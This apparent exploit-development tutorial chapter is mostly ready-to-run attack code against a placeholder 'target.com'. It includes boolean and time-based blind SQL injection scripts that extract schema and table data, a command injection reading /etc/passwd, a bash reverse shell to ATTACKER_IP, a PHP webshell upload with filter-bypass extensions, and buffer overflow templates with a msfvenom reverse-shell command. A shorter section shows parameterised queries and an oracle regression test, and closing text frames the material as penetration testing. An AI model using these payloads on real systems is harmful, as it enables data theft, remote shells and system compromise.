Exploit Development
🔥 Vibe Prompt
"Develop exploit for Blind SQLi: extract DB name, tables, columns via boolean-based inference."
Blind SQLi Exploit
```python
import requests
import string

URL = "http://target.com/item?id=1"

def check(condition):
    """Returns True if condition is true"""
    payload = f"1 AND ({condition})"
    r = requests.get(URL.replace("id=1", f"id={payload}"))
    return "Item found" in r.text  # Boolean oracle

# Extract DB version
db_version = ""
for i in range(1, 10):
    for c in string.digits + ".":
        if check(f"SUBSTR(version(),{i},1)='{c}'"):
            db_version += c
            print(f"DB version: {db_version}")
            break

# Extract table names
tables = []
for i in range(1, 20):  # Try first 20 tables
    table_name = ""
    for j in range(1, 30):  # Max name length 30
        found = False
        for c in string.ascii_lowercase + "_":
            if check(f"SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET {i-1}),{j},1)='{c}'"):
                table_name += c
                found = True
                break
        if not found:
            if table_name:
                tables.append(table_name)
                print(f"Table {i}: {table_name}")
            break

# Extract data from first table
data = ""
for i in range(1, 20):
    for c in string.printable:
        if c in ("'", "`"):
            continue
        payload = f"SUBSTR((SELECT * FROM {tables[0]} LIMIT 1),{i},1)='{c}'"
        if check(payload):
            data += c
            print(f"Data: {data}")
            break
    if len(data) < i:  # No more data
        break
```
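As an added example from the defender's side (not code from the original page), the following shows why the `Item found` oracle above exists and how input validation plus parameter binding removes it. The in-memory SQLite table is constructed here to stand in for the database behind the `item?id=1` endpoint; the column and table names are assumptions.

```python
import sqlite3

def build_db():
    """Constructed sample data standing in for the endpoint's backing store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return conn

def lookup_vulnerable(conn, item_id):
    # The raw parameter is spliced into the SQL text, so a condition appended
    # to the id decides whether the row matches. The differing response text
    # is the boolean oracle that the inference loop above keys on.
    row = conn.execute(f"SELECT name FROM items WHERE id = {item_id}").fetchone()
    return "Item found" if row else "Item not found"

def lookup_safe(conn, item_id):
    # Two layers: reject anything that is not an integer, then bind the value
    # as a parameter so it can never be interpreted as SQL.
    try:
        numeric_id = int(item_id)
    except ValueError:
        return "Item not found"
    row = conn.execute("SELECT name FROM items WHERE id = ?", (numeric_id,)).fetchone()
    return "Item found" if row else "Item not found"

def oracle_leaks(lookup, conn):
    """True if a true/false condition appended to id=1 changes the response,
    i.e. the endpoint can be used as a boolean oracle."""
    true_case = lookup(conn, "1 AND (1=1)")
    false_case = lookup(conn, "1 AND (1=2)")
    return true_case != false_case

if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler leaks oracle:", oracle_leaks(lookup_vulnerable, db))
    print("hardened handler leaks oracle:  ", oracle_leaks(lookup_safe, db))
```

The same response-difference check is a cheap regression test to keep in a CI suite for any endpoint that takes a numeric identifier.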
Time-Based Blind SQLi
```python
import requests, time

URL = "http://target.com/item?id=1"  # same endpoint as in the boolean-based example

def time_check(condition):
    payload = f"1; IF({condition}) WAITFOR DELAY '0:0:5'--"
    start = time.time()
    requests.get(URL.replace("id=1", f"id={payload}"), timeout=10)
    return time.time() - start > 4  # >4s = true

# Exploit: check if admin exists
if time_check("SELECT COUNT(*) FROM users WHERE role='admin' > 0"):
    print("Admin user exists!")
```
Command Injection Exploit
```python
import requests

# Ping command injection
payload = "127.0.0.1; cat /etc/passwd"
r = requests.post("http://target.com/ping", data={"ip": payload})
if "root:" in r.text:
    print("Command injection confirmed!")
    # Extract all users
    for line in r.text.split("\n"):
        if ":" in line and not line.startswith("<!"):
            print(f"User: {line.split(':')[0]}")

# Reverse shell
# Listen: nc -lvnp 4444
payload2 = "127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
```
File Upload Exploit
```python
import requests

# Upload webshell
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "image/jpeg")}
r = requests.post("http://target.com/upload", files=files)

# Execute commands
r = requests.get("http://target.com/uploads/shell.php?cmd=id")
print(f"Command output: {r.text}")

# Better: use .phtml, .php5, .shtml (bypass extension filter)
files2 = {"file": ("shell.phtml", "<?=system($_GET['c'])?>", "image/jpeg")}
```
Buffer Overflow (Basic)
```python
import socket

shellcode = b""  # Placeholder: your shellcode goes here

# EIP offset: 524 bytes
payload = b"A" * 524        # Fill buffer + EBP
payload += b"BBBB"          # Overwrite EIP (control execution)
payload += b"\x90" * 32     # NOP sled
payload += shellcode        # Your shellcode

s = socket.socket()
s.connect(("target.com", 9999))
s.send(payload + b"\r\n")
s.close()
```
Exploit Development Process
1. Fuzzing: find crash point (SPIKE, Peach)
2. Control: determine offset to EIP
3. Bad chars: identify bad bytes (\x00, \x0a)
4. Return: find JMP ESP address (mona.py)
5. Shellcode: generate with msfvenom
6. Exploit: assemble final payload
7. Test: debug with Immunity / WinDbg
Python Exploit Template
```python
#!/usr/bin/env python3
import sys, socket

def exploit(target, port):
    offset = 524
    eip = b"\x42\x42\x42\x42"
    # msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -b "\x00\x0a" -f python
    shellcode = b""
    payload = b"A" * offset + eip + b"\x90" * 16 + shellcode
    s = socket.socket()
    s.connect((target, port))
    s.send(payload)
    s.close()
    print(f"Exploit sent to {target}:{port}")

if __name__ == "__main__":
    exploit(sys.argv[1], int(sys.argv[2]))
```
Best Practices
- Always use safe SEH/vectored exception handling
- Test exploit multiple times
- Add version/OS checks before exploitation
- Use Egghunters for limited buffer space
- Document exploit prerequisites
- Clean up artifacts after testing
Exploit Development: Not Just Attack, but Defence
You may think exploit development is something only hackers do. In fact, understanding how to attack is the prerequisite for building defences: if you do not know how attackers get in, you cannot know how to keep them out.
The Exploit Lifecycle
Discover vulnerability → Verify it exists → Develop PoC → Build exploit → Report / patch
A professional penetration tester's goal is not destruction, but to:
- Prove the vulnerability is exploitable: saying "this might be insecure" is not enough; you have to actually demonstrate how it can be compromised
- Assess the risk level: a vulnerability that yields a remote shell directly is far more severe than one that requires user interaction
- Assist remediation: provide a PoC so the development team can reproduce the issue and verify the fix
Black Box vs White Box Testing

| Test type | Known information | Suitable stage |
|:--------|:--------|:--------|
| Black Box | Only the target URL | External penetration test, red team exercise |
| Gray Box | Partial knowledge of architecture and accounts | Standard penetration test |
| White Box | Full source code and architecture | Code review, SDL secure development |

Next Chapter Preview: Web Exploitation
This chapter covered the basic concepts of exploit development. The next chapter focuses on the most common web application vulnerabilities, SQL Injection, XSS and SSRF, and on how common WAF protections are bypassed.